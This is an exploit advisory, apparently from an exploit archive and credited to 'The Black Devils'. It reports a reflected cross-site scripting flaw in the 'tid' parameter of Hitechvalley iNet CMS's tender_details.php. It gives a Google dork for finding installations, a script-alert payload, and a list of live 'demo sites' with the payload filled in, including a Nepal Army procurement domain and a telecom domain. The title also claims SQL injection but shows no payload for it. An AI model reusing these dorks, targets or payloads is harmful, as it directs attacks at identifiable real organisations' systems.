# Exploit Title: Hitechvalley iNet CMS SQL Injection vulnerability Remote XSS Vulnerability
# Date: 10/03/2013
# Author: The Black Devils
# Software Link: http://www.hitechvalley.net/
# Category : [ webapps ]
# Dork : # Google Keywords: "Powered by Hitechvalley i Net" inurl:tender_details | "Powered by Hitechvalley i Net" inurl:eproc | inurl:eproc inurl:tender_details | inurl:eproc site:np | "E-Submission of Bids" site:np
# Type : php
# Tested on: [Windows]
This vulnerability was discovered and researched by The Black Devils
>>> http://server/tender_details.php?tid='"><script>alert(1337);</script>'
Demo Sites :
http://eproc.nepalarmy.mil.np/tender_details.php?tid=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://202.70.64.24/tender_details.php?tid=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://eproc.ntc.net.np/tender_details.php?tid=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://202.166.194.81/tender_details.php?tid=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information